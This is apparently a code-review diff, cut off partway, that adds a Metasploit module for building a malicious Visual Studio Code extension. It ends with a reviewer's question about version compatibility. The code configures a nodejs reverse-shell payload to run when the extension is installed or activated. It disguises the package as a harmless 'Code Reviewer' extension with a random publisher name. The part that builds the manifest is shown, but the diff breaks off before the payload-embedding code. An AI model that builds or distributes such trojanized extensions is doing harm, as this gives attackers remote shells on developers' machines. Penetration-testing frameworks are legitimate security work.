modules/exploits/multi/fileformat/visual_studio_vsix_exec.rb

```diff
@@ -0,0 +1,157 @@
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::FILEFORMAT
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'Visual Studio vsix Extension Exec',
+        'Description' => %q{
+          Creates a vsix file which can be installed in Visual Studio Code as an extension.
+          At activation/install, the extension will execute a shell or two.
+
+          Tested against VSCode 1.87.2 on Ubuntu 22.04
+        },
+        'License' => MSF_LICENSE,
+        'Author' => [
+          'h00die', # Metasploit module
+        ],
+        'DefaultOptions' => {
+          'EXITFUNC' => 'thread',
+          'DisablePayloadHandler' => false,
+          'FILENAME' => 'extension.vsix',
+          'WfsDelay' => 3_600, # 1hr
+          'payload' => 'nodejs/shell_reverse_tcp' # cross platform
+        },
+        'Platform' => 'nodejs',
+        'Arch' => ARCH_NODEJS,
+        'Targets' => [
+          ['Automatic', {}],
+        ],
+        'References' => [
+          ['URL', 'https://medium.com/@VakninHai/the-hidden-risks-of-visual-studio-extensions-a-new-avenue-for-persistence-attacks-e56722c048f1'], # similar idea
+          ['URL', 'https://code.visualstudio.com/api/get-started/your-first-extension'],
+          ['URL', 'https://code.visualstudio.com/api/references/activation-events'] # onStartup Action
+        ],
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [REPEATABLE_SESSION],
+          'SideEffects' => []
+        },
+        'Privileged' => false,
+        'DisclosureDate' => '2024-03-22' # date of development
+      )
+    )
+
+    register_options([
+      OptString.new('NAME', [true, 'The name of the extension', 'Code Reviewer']),
+      OptString.new('DESCRIPTION', [true, 'The description of the extension', 'Reviews code']),
+      OptString.new('VERSION', [true, 'The version of the extension', '0.0.1']),
+      OptString.new('README', [false, 'The readme contents for the extension', '']),
+    ])
+  end
+
+  def name
+    datastore['NAME']
+  end
+
+  def description
+    datastore['DESCRIPTION']
+  end
+
+  def version
+    datastore['VERSION']
+  end
+
+  def readme
+    datastore['README']
+  end
+
+  def manifest
+    %(<?xml version="1.0" encoding="utf-8"?>
+<PackageManifest Version="2.0.0" xmlns="http://schemas.microsoft.com/developer/vsx-schema/2011" xmlns:d="http://schemas.microsoft.com/developer/vsx-schema-design/2011">
+  <Metadata>
+    <Identity Language="en-US" Id="extension-name-fillmein" Version="#{version}" Publisher="#{Rex::Text.rand_text_alpha(10)}" />
+    <DisplayName>#{name}</DisplayName>
+    <Description xml:space="preserve">#{description}</Description>
+    <Tags></Tags>
+    <GalleryFlags>Public</GalleryFlags>
+
+    <Properties>
+      <Property Id="Microsoft.VisualStudio.Code.Engine" Value="^1.87.0" />
```

Comment:
Does this mean the manifest will only work with versions 1.87.x? I'm wondering if this should be an option to make it compatible with other versions.